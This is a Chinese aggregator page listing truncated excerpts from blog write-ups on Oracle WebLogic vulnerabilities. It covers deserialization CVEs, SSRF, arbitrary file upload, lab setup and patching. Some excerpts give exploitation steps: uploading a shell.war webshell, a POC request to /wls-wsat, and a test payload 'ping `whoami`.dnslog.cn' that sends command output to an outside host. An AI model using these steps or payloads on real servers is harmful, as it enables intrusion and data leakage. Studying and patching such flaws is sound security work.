weblogic漏洞】的更多相关文章

[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但Cscan不需要编程同样可实现自定义功能,这比单纯插件化更容易实现插件功能Cscan旨在为用户提供一个高度灵活.简单易用.多线程.多网段的插件化扫描框架,减少大量重复性工作提高工作效率3.3及以上版本分为检测存活和不检测存活主机模式 程序采用多线程批量扫描大型内网IP段C段存活主机(支持上万个C段)插…
Weblogic漏洞 Weblogic任意文件上传(CVE-2018-2894) 受影响版本 weblogic 10.3.6.0.weblogic 12.1.3.0.weblogic 12.2.1.2.weblogic 12.2.1.3. 漏洞存在前提 后台base_domain设置中启用web服务测试页 利用漏洞方法 访问 http://xxx.com/ws_utc/config.do 设置Work Home Dir为 /u01/oracle/user_projects/domains/bas…
Weblogic漏洞分析之JNDI注入-CVE-2020-14645 Oracle七月发布的安全更新中,包含了一个Weblogic的反序列化RCE漏洞,编号CVE-2020-14645,CVS评分9.8. 该漏洞是针对于CVE-2020-2883的补丁绕过,CVE-2020-2883补丁将MvelExtractor和ReflectionExtractor列入黑名单,因此需要另外寻找一个存在extract且方法内存在恶意操作的类即可绕过补丁. 这里找到的是 Weblogic 12.2.1.4.0…
weblogic漏洞分析之CVE-2021-2394 简介 Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP.T3协议对存在漏洞的WebLogic Server组件进行攻击.成功利用该漏洞的攻击者可以接管WebLogic Server. 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表. 影响版本: Orac…
weblogic漏洞分析之CVE-2016-0638 一.环境搭建: 这里使用前一篇文章的环境,然后打上补丁 上一篇文章:https://www.cnblogs.com/yyhuni/p/15137095.html 下载补丁p20780171_1036_Generic和p22248372_1036012_Generic 解压补丁后,复制补丁到Docker中: docker cp ./p22248372_1036012_Generic/ d1b6be39e32e:/home/ docker cp…
weblogic漏洞分析之CVE-2017-10271 一.环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose…
weblogic漏洞初探之CVE-2015-4852 一.环境搭建 1. 搭建docker 这里用了vulhub的环境进行修改:https://vulhub.org/ 新建个文件夹,创建两个文件docker-compose.yml.DockerFile docker-compose.yml: version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "…
1.CVE-2018-2628.CVE-2018-2893 以上两个漏洞均是针对weblogic的t3服务进行攻击,如果有条件的,可以从oracle官网下载最新的补丁安装http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html.没有条件的,那么只能通过对weblogic的t3服务进行限制来预防攻击. 首先登录weblogic控制台:http://127.0.0.1:7001/console(ip和端口以…
1 weblogic控制台地址暴露 ²  整改方法: 禁用weblogic控制台.在weblogic域(sguap-domain和base-domain)的config下的config.xml中 </security-configuration>下面添加<console-enabled>false</console-enabled>. 禁用成功后如下图所示: 2.1.2 存在Java反序列漏洞        ²  整改方法: 方法一.更新weblogic自带jar包.升…
0x01 Weblogic简介 1.1 叙述 Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发.集成.部署和管理大型分布式Web应用.网络应用和 数据库应用的Java应用服务器. Weblogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发.集成.部署和管理之中,是商业市场上主要的Java(Java EE)应用服务器软件之一,也是世界上第一个成功商…
复现方式 Docker复现 WEBlogic爆出了很多漏洞 先了解一下现在主流的版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.1 Weblogic 12.2.1.2 Weblogic 12.2.1.3 ………… 历史漏洞 #控制台路径泄露 Weakpassword #SSRF: CVE-- #JAVA反序列化: CVE-- CVE-- CVE-- CVE-- CVE-- CVE-- #任意文件上传 CVE-- #XMLDecoder…
控制台路径 | 弱口令  前置条件 /console CVE-2016-0638  Date 类型远程代码执行 影响范围10.3.6, 12.1.2, 12.1.3, 12.2.1  CVE-2016-3510 Date 类型 影响范围10.3.6.0, 12.1.3.0, 12.2.1.0 CVE-2017-3248 Date 类型远程命令执行 影响范围10.3.6.0, 12.1.3.0,12.2.1.0, 12.2.1.1 复现 分析T3服务 CVE-2018-2628 Date2018.…
About WebLogic WebLogic是美商Oracle的主要产品之一,系购并得来.是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到12c(12.1.1)版.而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件(但目前Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业…
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) 0x01 漏洞原因: Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令. 0x02 影响版本: 10.3.6.0:12.1.3.0:12.2.1.1 0x3 POC: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: targ…
整理的一些利用方式,后续会更新到15年至今的洞 后台爆破拿shell 后台爆破: 部署-安装-上载文件 制作war包,一直下一步,最好保存 jar -cvf shell.war ./shll/* 上传成功后访问: http://172.16.20.134:7001/shell/shll/000.jsp Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) xmldecode代码执行漏洞,你可能要问为啥xmldecode能执行…
继续整理有关中间件漏洞思路(仅做简单思路整理,不是复现,复现请参考大佬们的长篇好文,会在文章中列举部分操作) WebLogic是Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件 WebLogic是用于开发.集成.部署和管理大型分布式Web应用.网络应用和数据库应用的Java应用服务器,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发.集成.部署和管理之中 支持的内容比tomcat.Jboss都多,是个…
CVE-2017-3248 & CVE-2018-2628 后面的漏洞就是2017-3248的绕过而已,所以poc都一样,只是使用的payload不同 本机开启JRMP服务端 ->利用T3协议发送payload使得weblogic反序列化后,开启JRMP客户端,并连接服务端 ->服务端发送exp给客户端,客户端上的DGC接收到响应即会反序列化. 详细的细节看我的另一篇文章:ysoserial payloads-JRMPClient 漏洞复现 使用ysoserial开启一个JRMP服务端…
漏洞描述:http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html 修复方式: 1.删除server/lib/uddiexplorer.war下的相应jsp文件. jar -xvf uddiexplorer.war | rm jsp-files | jar -cvfM uddiexplorer.war uddiexplorer/ 2.配置…
0x01 前言 CNCERT前几天发公告称发现Oracle公司出品的基于JavaEE结构的中间件WebLogic产品存在一个远程上传漏洞,并得到了厂商的确认,危害程度评分高达9.8分.鉴于厂商已进行了安全修复,笔者对该漏洞进行了一次分析.WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限.两个页面分别为/ws_utc/begin.do,/ws_utc/config.do:漏洞的影响范围 Oracle WebLogic Server,版本10.3.6.0,12.…
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)                                                -----by  backlion 0x01漏洞说明 近日,黑客利用WebLogic 反序列化漏洞CVE-2017-3248和WebLogic WLS LS组件的远程代码执行漏洞CVE-2017-10271,Oracle官方在2017年10月份发布了该漏洞的补丁,但没有公开漏洞细节,如果企业未及时安装补丁,存在被攻击的风…
来源: 时间:2017-12-23 00:00:00 作者: 浏览:1929 次 近期安恒信息在应急响应过程中发现有恶意攻击者利用WebLogic漏洞对企业服务器发起大范围远程攻击,攻击成功后植入挖矿后门程序,通过分析发现攻击者利用了Oracle WebLogic中WLS 组件漏洞(CVE-2017-10271).有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视.CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞…
Java安全之初探weblogic T3协议漏洞 文章首发自安全客:Java安全之初探weblogic T3协议漏洞 0x00 前言 在反序列化漏洞里面就经典的还是莫过于weblogic的反序列化漏洞,在weblogic里面其实反序列化漏洞利用中大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞.当然也还会有一些SSRF和任意文件上传漏洞,但是在这里暂且不谈. 下面来列出两个漏洞类型的一些漏洞编号 基于T3协议漏洞: CVE-2015-4582.CVE-2016-06…
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis.fastcgi等脆弱组件. 关于SSRF漏洞我们就不讲了,传送门--> SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞. 该漏洞存在于:http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 页面,我们向该页面提交以下参数: ?rdoSearch=name&txtSearchname=sdf&tx…
一.什么是Web漏洞扫描工具 即是指“扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具”,其中许多可能是由不安全或不正确的编码和设计.另一方面,通用(网络或系统)扫描器可以识别开放端口,主动IP地址和登录,主机操作系统和软件类型,修订版本和修补程序级别以及运行的服务. 二.漏洞扫描主要策略 1.主机漏洞扫描:通常在目标系统上安装了一个代理或是服务以便能够访问所有的文件与进程,以此来扫描计算机中的漏洞. 2.网络漏洞扫描:通过网络来扫描远程计…
1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现,10月份的漏洞是由于官方修复不完善导致被绕过. 嗯,又学习了很多知识. 2.批量测试脚本 # -*- coding: UTF-8 -*- import requests,sys,os help = ''' eg:CVE-2017-10271.py "ping \`whoami\`.dnslog.cv…
Ladon LadonGUI Cobalt Strike PowerLadon PythonLadon LinuxLadon 使用说明 ID 主题 URL 1 Ladon文档主页 https://github.com/k8gege/Ladon/wiki 2 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage 3 Cobalt Strike https://github.com/k8gege/Aggressor 4 Exp生成器使用 ht…
一.背景 近日阿里云安全团队发现了一起利用多个流行漏洞传播的蠕虫事件.黑客首先利用ThinkPHP远程命令执行等多个热门漏洞控制大量主机,并将其中一台“肉鸡”作为蠕虫脚本的下载源.其余受控主机下载并运行此蠕虫脚本后,继续进行大规模漏洞扫描和弱口令爆破攻击,从而实现横向传播.涉及的漏洞除了ThinkPHP远程命令执行漏洞,还有JBoss.Weblogic.Redis等产品的漏洞. 因为该蠕虫最初植入的恶意脚本名为ibus,所以命名为ibus蠕虫.本篇文章主要介绍了阿里云安全对此类蠕虫入侵的各个阶段…
SZhe_Scan碎遮:一款基于Flask框架的web漏洞扫描神器 天幕如遮,唯我一刀可碎千里华盖,纵横四海而无阻,是谓碎遮 --取自<有匪> 写在前面 这段时间很多时间都在忙着编写该项目,现在算是到了一个阶段性的终点,当然扫描器没有标题说的这么神,还有很多的不足需要完善和修补,也有自己很多想要添加的模块,和项目组成员一起加油长期维护该项目吧,算是给疫情在家的自己一个答案. 二旬已过,理想不灭 文章首发自悬剑微信公众号:https://mp.weixin.qq.com/s/oQPe29tX-w…
一.关于SSRF 1.1 简介: SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞,一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统.SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制.比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等. 1.2 利用SSRF能实现以下效果: 1)        扫描内网(主机信息收集,Web应用指纹识别…
转至:https://blog.csdn.net/weixin_30682635/article/details/111911952 [概述] 虽然当前国内去IOE波涛汹涌,但不可否认OracleWeblogic当前市场还有有一定使用量.所以,weblogic依然是中间件运维的重要工作之一.然而Oracleweblogic已经连续三个季度(2019年10月~2020年7月)曝出CVSS风险为9.8的高危安全漏洞,漏洞修复是一轮接着一轮,轮的哥都要吐了,但没办法,活儿还是不能拉下.本文主要是针对w…